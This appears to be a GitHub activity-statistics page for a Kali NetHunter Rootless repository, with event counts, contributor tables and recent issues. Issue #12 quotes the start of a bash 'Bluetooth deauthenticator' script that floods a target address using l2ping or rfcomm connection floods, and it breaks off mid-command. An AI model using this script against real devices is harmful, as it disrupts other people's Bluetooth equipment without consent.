Skip to content

HackWithSumit/KaliNethunter-Rootless

View on GitHub ↗Related repositories →

NetHunter Rootless Edition. Maximum flexibility with no commitment. Install Kali NetHunter on any stock, unrooted Android device without voiding the warranty.

active 2023-08-292026-05-05 (UTC)

Complete coverage26,406 / 26,406 hourly files (100%) · 2 absent upstream2023-08-152026-08-19 (UTC)
Events
177
Pushes
15
Pull requests
0
Issues
4
Stars
138
Forks
13

Activity over time

Daily event counts in the loaded window

Line chart, 981 days from 2023-08-29 to 2026-05-05. Pushes: 15 total, peak 2 in a day. Pull requests: 0 total, peak 0 in a day. Issues: 4 total, peak 1 in a day. Comments: 7 total, peak 2 in a day. Stars: 138 total, peak 2 in a day.

  • Pushes
  • Pull requests
  • Issues
  • Comments
  • Stars

Stars, PRs, issues and forks are under-captured in the later part of this window. GH Archive progressively stopped capturing non-push events during 2026 — −95% or worse by the end of the window. Every series here except Pushes fades for that reason, so a decline above reflects the archive, not this repository. Pushes stay reliable throughout, so read them, and the contributor counts derived from them, as the real signal. Data health has the measurements.

Top contributors

Pushes, PRs, issues, reviews and comments — stars and forks excluded, so this is contribution rather than popularity

ContributorContributionsPushesPRsComments
HackWithSumit191504
Bdshak1000
JoeB39961000
rishuak571001
gulshan5701001
Eksh123451000
AnosVoldigod11001
mhmreza88-svg1000

Recent activity

Latest issues, pull requests and releases

  • Issue#12mhmreza88-svg2025-12-30 17:08
    #!/bin/bash version="v0.1.2-alpha"; target_addr="$1"; packet_size="$2"; attack_type="$3"; echo "Bluetooth deauthenticator $version"; if [[ $# != 3 ]]; then echo -e "Attack types:\n"\ "\t1.) l2ping - Ping flood\n"\ "\t2.) rfcomm - Connect flood\n\n"\ "[i] Usage: $0 <target_addr> <packet_size> <attack_type>\n"; exit 0; fi if [[ "$attack_type" == 1 ]]; then cmd="l2ping -i hci0 -s $packet_size -f $target_addr"; elif [[ "$attack_type" == 2 ]]; then cmd="rfcomm connect $target_addr 1
  • Issue comment#11gulshan5702025-02-15 01:28
    Jm
  • Issue#11Bdshak2024-08-15 15:36
    Jm
  • Issue#10JoeB39962024-03-17 13:42
    Kali Nethunter
  • Issue comment#9HackWithSumit2023-09-28 17:18
    Kali nethunter error
  • Issue comment#9AnosVoldigod12023-09-28 04:10
    Kali nethunter error
  • Issue comment#9HackWithSumit2023-09-25 04:03
    Kali nethunter error
  • Issue comment#9HackWithSumit2023-09-25 04:03
    Kali nethunter error
  • Issue comment#9rishuak572023-09-24 07:59
    Kali nethunter error
  • Issue comment#9HackWithSumit2023-09-23 12:36
    Kali nethunter error
  • Issue#9Eksh123452023-09-23 05:45
    Kali nethunter error

Totals cover only the window loaded into ClickHouse and count events, not GitHub's lifetime totals — 138 stars here means stars gained during the window, not the repo's star count.